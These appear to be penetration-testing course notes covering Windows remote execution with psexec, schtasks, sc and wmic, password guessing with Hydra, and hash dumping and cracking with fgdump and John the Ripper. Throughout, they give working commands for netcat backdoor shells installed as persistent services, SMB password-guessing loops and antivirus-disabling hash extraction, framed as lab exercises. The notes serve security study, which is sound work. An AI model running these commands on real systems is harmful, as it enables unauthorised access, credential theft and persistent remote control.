C:\> netsh firewall set opmode enabled

C:\> for /L %i in (1,1,255) do @echo 10.10.10.%i: & @nslookup 10.10.10.%i 10.10.10.60 2>nul |find "Name"

to display only successful lookups

C:\> for /L %i in (1,1,255) do @nslookup 10.10.10.%i 10.10.10.60 2>nul | find "Name" && echo 10.10.10.%i

C:\> for /f %i in (ports.txt) do @c:\tools\nc.exe -n -vv -w3 10.10.10.50 %i

C:\> for /f %i in (password.lst) do @echo %i & @net use \\10.10.10.10 %i /u:falken 2>nul && pause

• psexec
• at or schtasks
• make into a service and run with sc
• wmic

• Free from Microsoft Sysinternals www.microsoft.com/technet/sysinternals/utilities/psexec.mspx
• not built in, but flexible
• Can us it to run a command already installed on target, or, with -c option, will copy a program to target to run

C:\> psexec \\[targetIP] [-d] [-u user] [-p password] [command]

• will use existing user credentials if not -u and -p provided
• Use -s to run with local SYSTEM privileges
• By default, Standard In and Standard Out sent from/to psexec
• The -d means run detached (in background, no interaction with Standard Input or Standard Output)

set up SMB session as admin user

C:\tools>net use \\10.10.10.10 /u:falken

Run ipconfig and see its output channelized

C:\tools>psexec \\10.10.10.10 ipconfig

Run cmd.exe and get access to its Standard In and Out inline…a remote shell

C:\tools>psexec \\10.10.10.10 cmd.exe

• at has simpler syntax
• schtasks is more flexible

net use \\[targetIP] [password] /u:[admin_user]
c:\> sc \\[targetIP] query schedule

If schedule service is not running, it can be started with:

C:\> sc \\[targetIP] start schedule

Schedule a job

C:\> at [\\targetIP] [HH:MM][A|P] [command]

or

schtasks /create /tn [taskname] /s [targetIP /u [user] /p [password] /sc [frequency] /st [starttime] /sd [startdate] /tr [command]

• start time must be in HH:MM:SS format
• Frequency can be MINUTE, HOURLY, DAILY, WEEKLY, MONTHLY, ONCE, ONSTART, ONLOGON, ONIDLE
• To run command as system, replace /u [user] /p [password] with /ru SYSTEM

• Check status of jobs with:

c:\> at \\[targetIP]
C:\> schtasks /query /s [targetIP]

• We can use the service controller command (sc) to define our executable as a new service and then start it

C:\> net use \\[targetIP] [password] /u:[admin_user]
C:\> sc \\[targetIP] create [svcname] binpath= [command]
C:\> sc \\[targetIP] start [svcname]

• Runs with local SYSTEM privileges
• Runs for 30 seconds, then the system kills it because it doesn't make and API call back saying that the service started successfully
• use double quotes for a full set of command arguments

binpath= "c:\tools\nc.exe -L -p 2222 -e cmd.exe"

• By default, services are created as “demand”, we could specify “start= auto” to make a service that starts automatically

C:\> sc \\[targetIP] start [svcname]

• Two methods for dodging the 30 second dilemma
  • Use sc to start a cmd.exe, which we then use to invoke another command
    • cmd.exe will live for only 30 seconds

c:>\ sc \\[targetIP] create [svcname] binpath= “cmd.exe /k [command]”

to use the sc command to run a Netcat (nc.exe) backdoor persistent listener (-L) on local TCP port(-p) 2222 giving remote command shell access (-e cmd.exe), assuming nc.exe is located in c:\tools

C:\> sc \\[targetIP] create netcat binpath= "cmd.exe /k c:\tools\nc.exe -L -p 2222 -e cmd.exe"

• use a program to wrap an executable so that it throws the API call indicating successful service start
  • InGuardians' free ServifyThis tool does this
    • http://www.inguardians.com/tools
• to clean up the service after we are through,

C:\> sc \\[targetIP] delete [svcname]

• WMIC = Windows Management Instrumentation Control command
  • built into WinXP Pro, 2003, Vista, Win 7 and Win 2008
  • can be used to manage Win2K and later
• Can be used to interact with various aspexts of a system
  • processes, services, startup, etc
• Runs against local system by default
  • or can be invoked to take action on a target
• To make it run a program on a target immediately, you could use:

C:\> wmic /node:[targetIP] /user:[admin_user] /password:[password] process call create [command]

• Use /node:@[filename] to run command on all target machines listed on per line in filename
  • i.e. replace targetIP with @filename to run a list in filename

list processes on a target with:

C:\> wmic /node:[targetIP] /user:[admin_user] /password:[password] process list brief

kill a process on a target by PID with:

C:\> wmic /node:[targetIP] /user:[admin_user] /password:[password] process where processid="[PID]" delete

kill a process on a target by name with:

C:\> wmic /node:[targetIP] /user:[admin_user] /password:[password] process where name="[name]" delete

• practice techniques for making commands run on Windows with local SYSTEM privileges

C:\> nc.exe -l -p 2222 -e cmd.exe

victim: C:\> c:\tools\nc.exe -l -p 2222 -e cmd.exe
attacker: C:\> c:\tools\nc.exe 127.0.0.1 2222

attacker: C:\> hostname
attacker: C:\> sc \\[YourHostname] create ncservice binpath= "c:\tools\nc.exe -l -p 2222 -e cmd.exe"

Use hostname and not ip address locally. IP address works fine remotely.

attacker: C:\> sc \\[YourHostname] query ncservice

it should be stopped

victim: C:\> netstat -ano 1 |find "2222"

if the port is in use, for this exercise, kill it with:

victim: C:\> taskkill /PID [process_ID]

Once the monitor is in place:

attacker C:\> sc \\[YourHostname] start ncservice

After 30 seconds, the listener will be killed by the system

stop the netstat command on the victim window with CTRL-C

Delete our original ncservice and replace with a more persistent listener

attacker: C:\> sc \\[YourHostname] delete ncservice

restart the monitor

victim: C:\> netstat -nao 1 | find "2222"
attacker: C:\> sc \\[YourHostname] create ncservice2 binpath= "cmd.exe /k c:\tools\nc.exe -l -p 2222 -e cmd.exe"
attacker: C:\> sc \\[YourHostname] start ncservice2

The sc command should hand and then fail with the same error message, but now, the listener should still be up with port 2222 staying open

attacker: C:\> c:\tools\nc.exe 127.0.0.1 2222

• the -L option for nc.exe will allow the backdoor shell to be persistent

Kill Netcat client by hitting CTRL-C in the attacker window and stop netstat in the victim window

delete your ncservice2

attacker: C:\> sc \\[YourHostname] delete ncservice2

verify that port 2222 is no longer listening

victim: C:\> nestat -ano |find "2222"

• do a similar thing, running a Netcat listener with wmic instead of sc
• this method will create a service with administrator privileges instead of SYSTEM like sc

To be different, we will use wmic to monitor instead of netstat

victim: C:\> wmic process where name="nc.exe" list brief /every:1

attacker: C:\> wmic process call create "c:\tools\nc.exe -l -p 4444 -e cmd.exe"

for remote operation add:

C:\> wmic /node:[YourHostname] /user:[AdminUser] /password: [password] ...

attacker: C:\> c:\tools\nc.exe 127.0.0.1 4444

Try some commands: hostname, ipconfig, dir…hit CTRL-C when finished

• occured because we invoked Netcat without the -d option
  • if netcat can interact with the desktop, it will open the window unless the -d is used

C:\> wmic process call create "c:\tools\nc.exe -d -l -p 4444 -e cmd.exe"

• The console window should not show up, but it might briefly flash

to finish:

C:\> wmic process where name="nc.exe" delete

• passwords remain dominant form of user authentication

• password guessing
  • Attempts to log on to target
• password cracking
  • steal encrypted/hashed passwords

• Users manually synchronize their passwords between systems
• crack passwords on machines conquered with UID 0 or SYSTEM privileges. Those could be useful elsewhere.

• LANMAN passwords are all upper case
• Windows 2000+(LM) and Linux use varied case
• lm2ntcrack
  • input: cleartext LANMAN password (all caps) and ciphertext NT has
  • output: cleartext NT Password (mixed case)
  • available at http://www.xmcopartners.com/lm2ntcrack
  • also in Metasploit

• Build a comprehensive wordlist from free dictionaries, put together in one large file
• Create custom dictionary tuned to your target environment
  • Make sure they are uniq

cat wordlist.txt |sort |uniq > dictionary.txt

• Windows dictionary generator
  • http://www.fonlow.com/zijianhuang/kpa

$ mkdir /tmp source
$ cd /tmp/source
$ wget -r -l [N] [target_website]
$ cd ..
$ grep -h -r "" source | tr '[:space:]' '\n' | sort | uniq > worklist.lst
$ grep -v '<' wordlist.lst > newlist.lst

• Update dictionary file with newly cracked passwords while the test occurs
  • shred the dictionary file when the project is complete
• Create or procure pre-compiled dictionaries - Rainbow tables

• Divide work across multiple machines
• Use real, not virtual machines

• sniffing clear text protocols such as telnet, ftp, http
• keystroke logging
• pass the hash with protocols like LANMAN and NT hashes

• be careful not to leave copies of password files laying around
  • /etc/passwd /etc/shadow
  • SAM backup files from Windows
  • Ntds.dit files from Windows Active Directory
  • John the Ripper's john.pot files
• Googling for hashes may violate policies

• Do not crack on target machines
• Grab a copy instead
• encrypt password files when moved on network

• Record the time it took to crack each discovered password; it will help determine vulnerability
• Have users change all cracked passwords
• shred all password file copies and cracked results

• Dangerous! Password guessing against a target that uses account lockout could result in a denial of service
• Target personnel may ned to monitor carefully during test
  • Microsoft's LockoutStatus.exe tool pulls info about locked out accounts from Active Directory
  • ALockout.dll records a text file of apps that may be locking out accounts - useful for troubleshooting

• Lockout threashold: valid values 0 (no lockout) to 999
• Lockout duration: How long until account is automatically re-enabled (minutes)?
• Lockout observation window: How long to count bad guesses before resetting (minutes)?

C:\> net accounts
C:\> net accounts /domain

• By default, the original Administrator account (500) (which may be renamed) cannot be locked out
  • Microsoft's free passprop.exe can change this
  • Windows 2000 lockout applies to network access, not local console
  • Windows 2003 applies lockout functionality to both network and local console logon attempts
  • Active directory can also configure behavior
    • http://support.microsoft.com/kb/885119

C:\> wmic useraccount list brief

• not as likely configured
• likely done via PAM
• documentation: /usr/share/doc/pam-[version]/txt/README.pam_tally

• PAM configuration stored in /etc/pam.conf or /etc/pam.d/
• to check if in use:

# grep tally /etc/pam.d/*
# grep tally /etc/pam.conf
auth required /lib/security/pam_tally.so deny=5 onerr=fail lock_time=180 reset no_magic_root

• By default, root acount is not locked out via PAM, unless even_deny_root_account is set in pam.d files

• Safest: Don't perform
  • Lowers value of testing
• Ask target personnel
  • net accounts /domain
  • grep tally /etc/pam.d/*

* Create one or more test accounts

• If lockout occurs on Windows
  • boot a Linux CD and reset the admin password
  • Peter Nordahl's tool at http://home.eunet.no/~pnordahl/ntpasswd/
    • supports NT, 2000, XP, 2003, and Vista
    • EFS encryption will be lost
• If lockout occurs on Linux
  • Mount the file system
  • counts are maintained on Linux by default in /var/log/faillog

# faillog -r -u [login_name]

• kon-boot

A boot sector for USB or CD-ISO

• command line - hydra
• X-win GUI - xhydra
• supports many protocols

• THC-Hydra includes pw-inspector to trim wordlist
  • -i: Input file (or use Standard In)
  • -o: Output file (or use Standard Out)
  • -m [n]: Min password length
  • -M [N]: max password length
  • -c [count]: Minimum number of criteria required in each password
  • Criteria
    • -l: lower case
    • -u: upper case
    • -n: numbers
    • -p: printable chars not in lower/upper/num
    • -s: special characters (all others)

• Attack two machines
  • 10.10.10.10 (Windows), user is george, with file and print sharing
  • 127.0.0.1 (linux), user is jim, SSH service protocol v2
• Minimum password length 6
  • number, upper, lower

copy password list from John the Ripper and start tweaking

# cp /home/tools/john-1.7*/run/password.lst /tmp

count the words

# wc -l /tmp/password.lst

look at the list

# gedit /tmp/password.lst

review options

# pw-inspector

look at passwords with numbers

# cat /tmp/password.lst | pw-inspector -n

look at printable character words

# cat /tmp/password.lst | pw-inspector -p

generate a list matching policy

# cat /tmp/password.lst | pw-inspector -m 6 -n -u -l -c 2
# cat /tmp/password.lst | pw-inspector -m 6 -n -u -l -c 2 > /tmp/custom_list.lst

# xhydra

Single Target = 10.10.10.10
Protocol = SMB (the server message block protocol used by Windows file and print sharing)
Leave the Port at 0 to use the default port for the protocol

on password tab

username = george
"Password List" = /tmp/custom_list.lst
Check "Try login as password" and "Try empty password"

• Look at the bottom of the Hydra window and you can see the command line that the GUI is constructing.

# tcpdump -nn host 10.10.10.10

note port used is 139

change protocol to smbnt

note port used is 445

# useradd jim
# passwd jim
bond007
bond007
# lsof -Pi

look for port 22, start if not running

# service sshd start
# service iptables stop

# xhydra
target = 127.0.0.1
protocol = ssh2
port 0 for default of 22
check Show Attempts

Password tab

Username: jim
Password List /tmp/custom_list.lst
Check "Try login as password" and "Try empty password"

# tcpdump -i lo
# tail -f /var/log/messages

• Very likey did not work because of overwhelming target

# ps aux | grep hydra
# ps aux | grep hydra | wc -l

"Number of Tasks" from 36 to 1

restart the test

cleanup and remove home directory (-r)

# userdel -r jim

• In the SAM database, Windows can store passwords in two forms:
  • Lanman
  • NT Hash
• By default, both are stored in NT, 2000, XP, and 2003
  • LANMAN hashes are not stored in Vista and 2008 by default (although, that can be altered)

• Active Directory stored account information including LANMAN and NT hashes in %systemroot%\ntds\ntds.dit
• it stores whole domain schema
• with admin privileges and physical access, a user can boot to a special domain admin recovery mode and get a copy of this file
  • no tools to parse this file for LANMAN and NT hashes have been publicly released
• with admin or SYSTEM privileges, you can dump Windows password representations from Active Directory using pwdump tools, locally or across the network

• If password < 15 characters, pad it to exactly 14 characters
• Convert to upper case
• Break into two 7-character pieces
• Use each piece as a DES key to encrypt a constant of KGS!@#$%
• Concatenate two pieces

Local
define NO LANMAN HASH

• Full password is hashed using MD4
  • Case is preserved
  • Passwords up to 256 characters long
• Neither LANMAN nor NT hases are salted
  • Rainbow Table attacks much more feasible

• From a network perspective, Windows supports multiple forms of cryptographic authentication
  • LANMAN Challenge/Response
  • NTLMv1
  • NTLMv2
  • Microsoft Kerberos
• Each is generated from stored LANMAN and/or NT has in SAM or AD

• Client initiates authentication
• Server sends challenge
• Client formulates response from challenge by:
  • Padding LANMAN hash to 21 bytes
  • Splitting LANMAN hash into 3 seven-byte pieces
  • Using each piece as a DES key to encrypt challenge
• NTLMv1 does the same thing, except it uses NT has as starting point for this operation

• graphical representation on this slide

• More sophisticated and harder to crack
• client initiates authentication
• Server sends server challenge
• Client formulates response from server challenge by:
  • Creating the HMAC-MD5 of User name and Domain name with NT hash as the key
  • The result is called the NTLMv2 One-Way Function (OWF)
  • Then, the response is created from the HMAC-MD5 of server challenge, time stamp, client challenge, and other items, using the NTLMv2 OWF as the key

shutdown /a (aborts shutdown) (CTRL-SHIFT-ENTER on Win 7 to run as administrator)

• Most rely on underlying crypt(3) function of operating system
  • Input: user's password, random salt
  • Output: text string
  • The crypt routine used to formulate passwords varies on different variants of Unix and Linux
    • Traditional DES-based schemes - some systems still use
    • MD5 - very common today, hashed password starts with $1$
    • BSDi Extened DES, hashed passwords start with _
    • Blowfish-based - hashed passwords start with $2$ or $2a$
    • SHA-256, used by some Linux distros, starts with $5$
    • SHA-512, used by other Linux distros, starts with $6$

• Traditional DES-based scheme
  • Starts with user's password
  • Truncate to 8 characters
  • Shrink to 7-bits per character
  • Use resulting 56-bit key to DES encrypt zero-clock 25 times, folding a 12-bit salt into the algorithm
  • Results are base64-encoded
  • Some systems tweak number of DES rounds and start with non-zero block

• Start with password, any length
• Keep full character set (not just 7-bit ASCII)
• Hash password and salt together
• Take result and hash it along with original password and salt
• Apply in multiple rounds, varying the manner in which hash, salt, and password are interleaved in each round
• Some system apply 1,000 rounds
• Others have variable number of rounds
• SHA-256 and SHA-512 use a similar stragtegy, but with different algorithm and 5,000 rounds by default

• Grab a copy of /etc/password
  • Contains login names, UID numbers, and possibly password representations (if not shadowed)
  • Readable by an account on system
• Grab a copy of /etc/shadow
  • Contains password representations, security setting, etc.
  • Readable only by accounts with UID 0
• Combine two together with script

John the Ripper's unshadow script pulls account info from /etc/passwd and password info from /etc/shadow, creating one resulting file suitable for cracking

• pwdump family of products use admin privs to extrat hashes across the network using Windows file and print sharing protocols and various API's
  • Pulls local account on non-DC systems
  • pulls AD account from Domain Controllers
• Metasploit Meterpreter hashdump capability
  • no Windows file and print sharing protocol access needed
• Sniff Challenge/response from the network
  • LANMAN challenge/response, NTLMv1, NTLMv2, MS Kerberos

• Use admin privs to access remotely accessible share, copy extraction code there, and run it, grabbing shares from memory of running processes and sending back via named pipe to attacker
  • Pull hashes from local SAM as well as Active Directory database
• Many tools rely on DLL injection into LSASS process with Windows CreateRemoteThread API call to extract hashes
• When process is complete, tools automatically delete artifacts left on target's file system
• pwdump2 to pwdump3
  • move hashes across network in clear text
  • May crash LSASS due to Windows DEP forcing a reboot

• Pwdump3e to pwdump6
  • Encrypt hases as they move across network - pwdump6 uses Blowfish
  • Chance of crashing LSASS lowered by marking inject code as executable
• fgdump
  • From Fizzgig of the Foofus hacking group
  • Address problem of antivirus tools deleting pwdump programs and DLL's copied to target file system for extraction
  • Before moving files, fgdump remotely disables AV tools and then moves file to dump password hashes

• The fgdump tool also integrates cachedump functionality
  • Windows machines store information about the last 10 logon names and passwords in the Registry
    • useful if domain goes down
    • Stored in the Registry, in HKLM\SECURITY\CACHE\NL$n, with n ranging between 1 and 10
  • They are encrypted with an LSA key created for each system
• Cachedump tools (such as fgdump) pull the LSA key from LSASS memory, and grab the cached NT and LANMAN credentials from the registry
• These credentials are stored in encrypted form, salted with the username in Unicde format
• Extracted cache credentials can be creacked using a customized patch for John the Ripper

• The Metasploit priv module can dump hases from a local Windows machine
• Requires the Meterpreter to run from within an admin or SYSTEM-level process
• Doesn't require remote NetBIOS or SMB access
  • uses meterpreter communications session
• Doesn't copy files to target's file system
  • Entirely memory resident, with a DLL running inside of exploited process
  • A much smaller footprint for forensics investigators to find
• Doesn't have issues with DEP
  • As long as Metasploit exploit and Meterpreter payloads themselves are executed without cousing a DEP exception

• Instead of grabbing the SAM from a target machine, the attacker could sniff challenge/response authentication from the network
• The attacker would have to be located on the path between a victim machine and the system to which it authenticates…or trick the user into doing challenge/response authentication with the attacker's machine

C:\> cd c:\tools\fgdump\Release
C:\> fgdump.exe -c

C:\> net use
C:\> fgdump -c -h 10.10.10.10 -u falken

or

C:\> fgdump -c -h 10.10.10.10 -u 10.10.10.10\falken
joshua

while running, we can see that it opened a network share

C:\> net use

mknod backpipe p
nc -l -p 445 0<backpipe | nc 10.10.10.10 445 | tee backpipe

within 2 seconds (the smb session expects a request):

C:\> fgdump -c -h [LinuxIP] -u falken -p joshua

fgdump -c -h [Your Linux IPaddr] -u falken -p joshua

Some windows machines need the domain specified–10.10.10.10\falken.

• Look for liles named 10.10.10.10.pwdump and [YourLinuxIPaddr].pwdump
• we can us the Windows file compare

C:\> fc 10.10.10.10.pwdump [YourLinuxIPaddr].pwdump
C:\> type [YourLinuxIPaddr].pwdump

• free at www.openwall.com/john
• John the Ripper Pro $40
• patch still will not crack NTLMv2

• configured via john.conf (Linux or john.ini (Windows)
• Supports four modes
  • Single Crack - use login and GECOS info
    • Config under: [List.Rules:Single]
  • Wordlist - use dictionary
    • Config under: [List.Rules:Wordlist]
  • Incremental - brute force attack
    • Config under: [Incremental:All],[Incremental:Alpha],[Incremental:Alnum], etc
  • External - write your own guessing code
    • Config uner:[List.External:[name]]
    • Modules usually written in C

• When John cracks a password, it displays the result on the screen and stores it in the john.pot file
  • John will not load passwords that it has already cracked based on what is stored in john.pot

$ ./john --show [password_files]

• John stores its current status in the john.rec file
  • updated every 10 minutes in case John or the system crashes
  • When you start John, it automatically picks up where it left off in the john.rec file
    • no indication of this
    • remove the john.rec and john.pot file to start over
  • Format is undocumented on purpose
  • Hit CTRL-C to stop John
    • will flush current status in to john.rec
  • Hit CTRL-C twice quickly, and itwill abort creating john.rec

• Hit any key and John tells you its current status
  • guesses: How many passwords it has guessed so far
  • time: How long it has been running (to 1 second accuracy)
  • percentage: The amount that it is finished with in Single Crack or Wordlist mode
  • c/s: Indicates “combinations per second” attempted
  • trying: The current password that it is trying

• John can be compiled to support specific different processor types
  • MMX instructions
  • Streaming Single SIMD Extensions 2 (SSE2) instructions
  • 64-bit
  • PowerPC
  • Others
• –test option will estimate the speed which john will run

• John doesn't officially support distributed cracking across multiple machines
  • You could have each John instance focus on one account (be careful…same salt account should be on same system)
• Or, you can have multiple iterations of John each trying different character-length passwords
  • Specify MinLen and MaxLen for incremental modein john.conf
• Each John can put its result in the same john.pot file, mounted as a files share specifying a different –session=[name]

• djohn by Luis Parravicini at http://ktulu.com.ar/blog/software/djohn/
  • splits up the work and distrubites it to several instances of John, tracking their status
• John-MPI by John Anderson at http://www.bindshell.net/tools/johntheripper
• Dnet, by John Anderson, at http://www.bindshell.net/tools/dnetj
  • no MPI install required
• Medussa, at http://bastard.net/~kos/medussa
  • cracks Linux and Unix DES and MD5 passwords

• most highly experimental and prone to crashing

• Most rely on CUDA (Compute Unified Device Architecture)
  • such as GeForce 8400 or later
• The Free GPU MD5 password cracker:
  • 200 million guess/encrypt/compare cycles per second on current hardware for unsalted MD5
• The free CUDA-multiforcer
  • Supports unsalted MD4, MD5, and NT hases
  • Over 900 million guess/encrypt/compare syscles per second
  • Backtrack 4 install guide for this feature: http://offensive-security.com/documentation/backtrack-4-cuda-guide.pdf
• The free aircrack-ng-CUDA version for WPA2 pre-shared key cracking
• The free pyrit for WPA and WPA2 PSK cracking with CoWPAtty
• Commercial Elcomsoft Distributed Password Recovery Tool (patent pendin) - US $599 for 20 client version